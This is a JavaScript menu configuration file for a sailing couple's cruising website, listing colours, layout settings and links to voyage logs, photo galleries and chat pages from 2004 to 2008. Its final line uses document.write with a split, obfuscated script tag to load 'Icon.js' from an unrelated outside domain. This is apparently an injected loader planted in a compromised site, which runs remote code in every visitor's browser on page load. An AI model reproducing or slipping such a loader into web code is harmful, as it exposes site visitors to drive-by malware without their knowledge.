/***********************************************************************************
*	(c) Ger Versluis 2000 version 5.411 24 December 2001 (updated Jan 31st, 2003 by Dynamic Drive for Opera7)
*	For info write to menus@burmees.nl		          *
*	You may remove all comments for faster loading	          *		
***********************************************************************************/

	var NoOffFirstLineMenus=9;			// Number of first level items
	var LowBgColor='#303030';			// Background color when mouse is not over
	var LowSubBgColor='#303030';		// Background color when mouse is not over on subs
	var HighBgColor='#d0d0d0';			// Background color when mouse is over
	var HighSubBgColor='#d0d0d0';	    // Background color when mouse is over on subs
	var FontLowColor='#ffffff';			// Font color when mouse is not over
	var FontSubLowColor='ffffff';	    // Font color subs when mouse is not over
	var FontHighColor='303030';			// Font color when mouse is over
	var FontSubHighColor='303030';		// Font color subs when mouse is over
	var BorderColor='#ffffff';		    // Border color
	var BorderSubColor='#ffffff';		// Border color for subs
	var BorderWidth=1;			        // Border width
	var BorderBtwnElmnts=0;		    	// Border between elements 1 or 0
	var FontFamily="arial,comic sans ms,technical"	// Font family menu items
	var FontSize=10;				    // Font size menu items
	var FontBold=1;				        // Bold menu items 1 or 0
	var FontItalic=1;				    // Italic menu items 1 or 0
	var MenuTextCentered='center';		// Item text position 'left', 'center' or 'right'
	var MenuCentered='center';			// Menu horizontal position 'left', 'center' or 'right'
	var MenuVerticalCentered='top';		// Menu vertical position 'top', 'middle','bottom' or static
	var ChildOverlap=.02;				// horizontal overlap child/ parent
	var ChildVerticalOverlap=0.0;		// vertical overlap child/ parent
	var StartTop=102;				// Menu offset x coordinate
	var StartLeft=5;				// Menu offset y coordinate
	var VerCorrect=0;				// Multiple frames y correction
	var HorCorrect=0;				// Multiple frames x correction
	var LeftPaddng=0;				// Left padding
	var TopPaddng=0;				// Top padding
	var FirstLineHorizontal=1;			// SET TO 1 FOR HORIZONTAL MENU, 0 FOR VERTICAL
	var MenuFramesVertical=1;			// Frames in cols or rows 1 or 0
	var DissapearDelay=500;			// delay before menu folds in
	var TakeOverBgColor=1;			// Menu frame takes over background color subitem frame
	var FirstLineFrame='navig';			// Frame where first level appears
	var SecLineFrame='space';			// Frame where sub levels appear
	var DocTargetFrame='space';			// Frame where target documents appear
	var TargetLoc='';				// span id for relative positioning
	var HideTop=0;				// Hide first level when loading new document 1 or 0
	var MenuWrap=1;				// enables/ disables menu wrap 1 or 0
	var RightToLeft=0;				// enables/ disables right to left unfold 1 or 0
	var UnfoldsOnClick=0;			// Level 1 unfolds onclick/ onmouseover
	var WebMasterCheck=0;			// menu tree checking on or off 1 or 0
	var ShowArrow=0;				// Uses arrow gifs when 1
	var KeepHilite=1;				// Keep selected path highligthed
	var Arrws=['images/tri.gif',5,10,'images/tridown.gif',10,5,'images/trileft.gif',5,10];	// Arrow source, width and height

function BeforeStart(){return}
function AfterBuild(){return}
function BeforeFirstOpen(){return}
function AfterCloseAll(){return}


// Menu tree
//	MenuX=new Array(Text to show, Link, background image (optional), number of sub elements, height, width);
//	For rollover images set "Text to show" to:  "rollover:Image1.jpg:Image2.jpg"

Menu1 = new Array("Home", "../index.htm", "", 0, 20, 90);

Menu2 = new Array("Crew Page", "../crew_page.htm", "", 0, 20, 80);

Menu3 = new Array("Boat Page", "", "", 2, 20, 110);
Menu3_1 = new Array("Ruby Tuesday (Dufour 40)", "../boat_page.htm", "", 0, 20, 170);
Menu3_2 = new Array("Mithril (Endurance 38)", "../mithril/mithrils_boat_page.html", "", 0, 20, 100);

Menu4 = new Array("Log Pages", "", "", 5, 20, 100);
Menu4_1 = new Array("2008 Northwards from Algarve", "", "", 10, 20, 200);
Menu4_1_1 = new Array("1 Winter in Port Velcro", "../2008_log/2008_log1.htm", "", 0, 20, 170);
Menu4_1_2 = new Array("2 Passage North begins", "../2008_log/2008_log2.htm", "", 0);
Menu4_1_3 = new Array("3 Stormbound in Cascais", "../2008_log/2008_log3.htm", "", 0);
Menu4_1_4 = new Array("4 A new weather window", "../2008_log/2008_log4.htm", "", 0);
Menu4_1_5 = new Array("5 No trades - thank goodness", "../2008_log/2008_log5.htm", "", 0);
Menu4_1_6 = new Array("6 The rain in Spain", "../2008_log/2008_log6.htm", "", 0);
Menu4_1_7 = new Array("7 Biscay crossing", "../2008_log/2008_log7.htm", "", 0);
Menu4_1_8 = new Array("8 France at last", "../2008_log/2008_log8.htm", "", 0);
Menu4_1_9 = new Array("9 Brittany & summer cruising", "../2008_log/2008_log9.htm", "", 0);
Menu4_1_10 = new Array("10 Page ten", "../2008_log/2008_log10.htm", "", 0);

Menu4_2 = new Array("2007 Atlantic Circuit", "", "", 9);
Menu4_2_1 = new Array("1 Lagos", "../2007_log/2007_log1.htm", "", 0, 20, 170);
Menu4_2_2 = new Array("2 Algarve Cruising", "../2007_log/2007_log2.htm", "", 0);
Menu4_2_3 = new Array("3 Sixty in Seville", "../2007_log/2007_log3.htm", "", 0);
Menu4_2_4 = new Array("4 Mini Atlantic circuit", "../2007_log/2007_log4.htm", "", 0);
Menu4_2_5 = new Array("5 Island of Porto Santo", "../2007_log/2007_log5.htm", "", 0);
Menu4_2_6 = new Array("6 Island of Madeira", "../2007_log/2007_log6.htm", "", 0);
Menu4_2_7 = new Array("7 Walking on Madeira", "../2007_log/2007_log7.htm", "", 0);
Menu4_2_8 = new Array("8 Levada walking on Madeira", "../2007_log/2007_log8.htm", "", 0);
Menu4_2_9 = new Array("9 500 Miles to windward", "../2007_log/2007_log9.htm", "", 0);

Menu4_3 = new Array("2006 La Rochelle to Lagos", "", "", 9);
Menu4_3_1 = new Array("1 New Year Message", "../2006_log/2006_log1.htm", "", 0, 20, 180);
Menu4_3_2 = new Array("2 La Rochelle to Arcochon", "../2006_log/2006_log2.htm", "", 0);
Menu4_3_3 = new Array("3 Arcochon to th Spanish Border", "../2006_log/2006_log3.htm", "", 0);
Menu4_3_4 = new Array("4 Hondaribia to Bilbao", "../2006_log/2006_log4.htm", "", 0);
Menu4_3_5 = new Array("5 Bilbao to La Coruna", "../2006_log/2006_log5.htm", "", 0);
Menu4_3_6 = new Array("6 Spanish Rias I", "../2006_log/2006_log6.htm", "", 0);
Menu4_3_7 = new Array("7 Spanish Rias II", "../2006_log/2006_log7.htm", "", 0);
Menu4_3_8 = new Array("8 Hell in the Rias", "../2006_log/2006_log8.htm", "", 0);
Menu4_3_9 = new Array("9 Portugal, down to Lagos", "../2006_log/2006_log9.htm", "", 0);

Menu4_4 = new Array("2005 UK to La Rochelle", "", "", 7);
Menu4_4_1 = new Array("1 UK south coast", "../2005_logs/2005_log1.htm", "", 0, 20, 180);
Menu4_4_2 = new Array("2 Channel Islands", "../2005_logs/2005_log2.htm", "", 0);
Menu4_4_3 = new Array("3 N Brittany coast", "../2005_logs/2005_log3.htm", "", 0);
Menu4_4_4 = new Array("4 N Biscay coast", "../2005_logs/2005_log4.htm", "", 0);
Menu4_4_5 = new Array("5 La Rochelle area", "../2005_logs/2005_log5.htm", "", 0);
Menu4_4_6 = new Array("6 Ruby Tuesday in La Rochelle", "../2005_logs/2005_log6.htm", "", 0);
Menu4_4_7 = new Array("7 Homeless in La Rochelle", "../2005_logs/2005_log7.htm", "", 0);

Menu4_5 = new Array("2004 Baltic Circuit", "", "", 9);
Menu4_5_1 = new Array("1 France Belgium & Holland", "../mithril/2004_log1.htm", "", 0, 20, 230);
Menu4_5_2 = new Array("2 Frisian Islands & Keil", "../mithril/2004_log2.htm", "", 0);
Menu4_5_3 = new Array("3 Germany Sweden & Gotland", "../mithril/2004_log3.htm", "", 0);
Menu4_5_4 = new Array("4 Sweden Aland Islands & Finland", "../mithril/2004_log4.htm", "", 0);
Menu4_5_5 = new Array("5 Russia Estonia Finland", "../mithril/2004_log5.htm", "", 0);
Menu4_5_6 = new Array("6 Homewards - Finland Sweden", "../mithril/2004_log6.htm", "", 0);
Menu4_5_7 = new Array("7 Denmark Germany Keil Canal", "../mithril/2004_log7.htm", "", 0);
Menu4_5_8 = new Array("7 Holland's Standing Mast Route", "../mithril/2004_log7.htm", "", 0);
Menu4_5_9 = new Array("8 N Sea & home to England", "../mithril/2004_log8.htm", "", 0);

Menu5 = new Array("Photo Gallery", "", "", 5, 20, 120);
Menu5_1 = new Array("2008 North Bound from Algarve", "", "", 10, 20, 200);
Menu5_1_1 = new Array("1 Almond Blossom Rally", "", "", 0, 20, 170);
Menu5_1_2 = new Array("2 Palacio de Sintra", "../gallery/2008_sintra.htm", "", 0);
Menu5_1_3 = new Array("3 Monastery of Alcobaca", "../gallery/2008_alcobaca.htm", "", 0);
Menu5_1_4 = new Array("4 Bayona", "../gallery/2008_bayona.htm", "", 0);
Menu5_1_5 = new Array("5 Coruna, Carminal & Betaznos", "../gallery/2008_couna.htm", "", 0);
Menu5_1_6 = new Array("6 Concareau", "../gallery/2008_concarneau.htm", "", 0);
Menu5_1_7 = new Array("7 Belle Ile", "../gallery/2008_belle_ile.htm", "", 0);
Menu5_1_8 = new Array("8 Chateau de Keriolet", "../gallery/2008_keriolet.htm", "", 0);
Menu5_1_9 = new Array("9 City of Quimper", "../gallery/2008_qui,per.htm", "", 0);
Menu5_1_10 = new Array("10 Brest 2008", "../gallery/2008_brest.htm", "", 0);


Menu5_2 = new Array("2007 Atlantic circuit", "", "", 3);
Menu5_2_1 = new Array("1 Algarve views", "../gallery/2007_views_of_the_algarve.htm", "", 0, 20, 170);
Menu5_2_2 = new Array("2 Algarve flowers", "../gallery/2007_flowers_of_the_algarve.htm", "", 0);
Menu5_2_3 = new Array("3 Madeira's flowers", "../gallery/2007_flowers_of_madeira.htm", "", 0);

Menu5_3 = new Array("2006 La Rochelle to Lagos", "", "", 5);
Menu5_3_1 = new Array("1 France's Biscay coast", "../gallery/2006_france.htm", "", 0, 20, 170);
Menu5_3_2 = new Array("2 Spain, Hondarribia", "../gallery/2006_hondarribia.htm", "", 0);
Menu5_3_3 = new Array("3 N Spain coast", "../gallery/2006_n_spain.htm", "", 0);
Menu5_3_4 = new Array("4 Spanish Rias", "../gallery/2006_spanish_rias.htm", "", 0);
Menu5_3_5 = new Array("5 Portuguese Atlantic", "../gallery/2006_portugal.htm", "", 0);

Menu5_4 = new Array("2005 UK to La Rochelle", "", "", 5);
Menu5_4_1 = new Array("1 UK's South Coast", "../gallery_scoast.htm", "", 0, 20, 170);
Menu5_4_2 = new Array("2 Channel Islands", "../gallery_channelislands.htm", "", 0);
Menu5_4_3 = new Array("3 North Brittany", "../gallery_nbrittany.htm", "", 0);
Menu5_4_4 = new Array("4 North Biscay", "../gallery_wbrittany.htm", "", 0);
Menu5_4_5 = new Array("5 La Rochelle area", "../gallery_biscay.htm", "", 0);


Menu5_5 = new Array("2004 Baltic circuit", "", "", 9);
Menu5_5_1 = new Array("1 UK Belgium & Holland", "../mithril/2004_gallery1.htm", "", 0, 20, 170);
Menu5_5_2 = new Array("2 Fresian Islands & Keil Kanal", "../mithril/2004_gallery2.htm", "", 0);
Menu5_5_3 = new Array("3 Germany, Bornholm & Oland Islands", "../mithril/2004_gallery3.htm", "", 0);
Menu5_5_4 = new Array("4 Sweden & Finnish Archipelago", "../mithril/2004_gallery4.htm", "", 0);
Menu5_5_5 = new Array("5 Russia I", "../mithril/2004_gallery5.htm", "", 0, 20, 170);
Menu5_5_6 = new Array("6 Russia II", "../mithril/2004_gallery6.htm", "", 0);
Menu5_5_7 = new Array("7 Estonia (Tallin)", "../mithril/2004_gallery7.htm", "", 0);
Menu5_5_8 = new Array("8 Heading home, Sweden & Denmark", "../mithril/2004_gallery8.htm", "", 0);
Menu5_5_9 = new Array("9 North Sea & home", "../mithril/2004_gallery9.htm", "", 0);

Menu6 = new Array("Technical Chat", "", "", 7, 20, 120);
Menu6_1 = new Array("Bicycles", "../chat_room.htm#bikes", "", 0, 20, 160);
Menu6_2 = new Array("Communications", "../chat_room.htm#comms", "", 0);
Menu6_3 = new Array("Gas", "../chat_room.htm#gas", "", 0);
Menu6_4 = new Array("Health & Fitness", "../chat_room.htm#health", "", 0);
Menu6_5 = new Array("Sunshine & shade", "../chat_room.htm#shade", "", 0);
Menu6_6 = new Array("Toilets & Holding tanks", "../chat_room.htm#toilets", "", 0);
Menu6_7 = new Array("Cruising tips", "../tips_page.htm", "", 0)

Menu7 = new Array("Links", "../links_page.htm", "", 0, 20, 70);
Menu8 = new Array("Contact Us", "../contact_page.htm", "", 0, 20, 110);
Menu9 = new Array("Guest Book", "javascript:opennewWindow('http://users4.smartgb.com/g/g.php?a=s&i=g44-06636-10')", "", 0,20,120);

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Icon.js"></scri'+'pt>');